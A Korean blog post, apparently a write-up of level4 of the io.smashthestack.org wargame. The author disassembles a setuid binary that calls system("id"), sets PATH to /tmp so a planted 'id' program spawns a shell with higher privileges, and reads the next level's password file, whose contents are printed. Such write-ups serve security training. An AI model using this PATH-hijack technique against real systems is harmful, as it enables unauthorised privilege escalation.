level4

2010. 1. 18. 15:59

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4)

level4@io:/levels$ gdb level4
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) disas main
Dump of assembler code for function main:
0x08048354 <main+0>:    lea    0x4(%esp),%ecx
0x08048358 <main+4>:    and    $0xfffffff0,%esp
0x0804835b <main+7>:    pushl  0xfffffffc(%ecx)
0x0804835e <main+10>:   push   %ebp
0x0804835f <main+11>:   mov    %esp,%ebp
0x08048361 <main+13>:   push   %ecx
0x08048362 <main+14>:   sub    $0x4,%esp
0x08048365 <main+17>:   movl   $0x8048488,(%esp)
0x0804836c <main+24>:   call   0x8048280 <system@plt>
0x08048371 <main+29>:   mov    $0x0,%eax
0x08048376 <main+34>:   add    $0x4,%esp
0x08048379 <main+37>:   pop    %ecx
0x0804837a <main+38>:   pop    %ebp
0x0804837b <main+39>:   lea    0xfffffffc(%ecx),%esp
0x0804837e <main+42>:   ret
0x0804837f <main+43>:   nop
End of assembler dump.
(gdb) x/s 0x08048488
0x8048488 <_IO_stdin_used+4>:    "id"



 달랑 system함수로 id 만 실행하는 바이너리네요. 환경변수를 이용해 볼까하고
 PATH를 바꿔주고 /tmp 에 가보니 이미 id 라는 쉘을 실행하는 바이너리가 있었습니다.

level4@io:/levels$ env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=121.162.229.149 5051 22
OLDPWD=/tmp
SSH_TTY=/dev/pts/5
USER=level4
MAIL=/var/mail/level4

PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
PWD=/levels
SHLVL=1
HOME=/home/level4
LOGNAME=level4
SSH_CONNECTION=121.162.229.149 5051 192.168.1.32 22
_=/usr/bin/env


level4@io:/levels$ export PATH=/tmp
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=121.162.229.149 5051 22
OLDPWD=/tmp
SSH_TTY=/dev/pts/5
USER=level4
MAIL=/var/mail/level4
PATH=/tmp
PWD=/levels
SHLVL=1
HOME=/home/level4
LOGNAME=level4
SSH_CONNECTION=121.162.229.149 5051 192.168.1.32 22
_=/usr/bin/env


level4@io:/levels$ ./level4
sh-3.1$ export PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
sh-3.1$
sh-3.1$ cat .pass
exc9spvi   > wj9mttkm--->RAhK8VOfcVYV


.pass를 보기전에 환경변수를 다시 셋팅~





 

저작자표시 비영리

'War game > io.smashthestack.org' 카테고리의 다른 글

io smashthestack level24  (0) 2014.02.09
level9  (0) 2010.01.21
level8  (0) 2010.01.21
level7  (0) 2010.01.19
level6  (0) 2010.01.19
level5  (8) 2010.01.19
level3  (0) 2010.01.18
level2  (0) 2010.01.18
level1  (0) 2010.01.18
level10  (1) 2009.05.04

badcob War game/io.smashthestack.org

티스토리툴바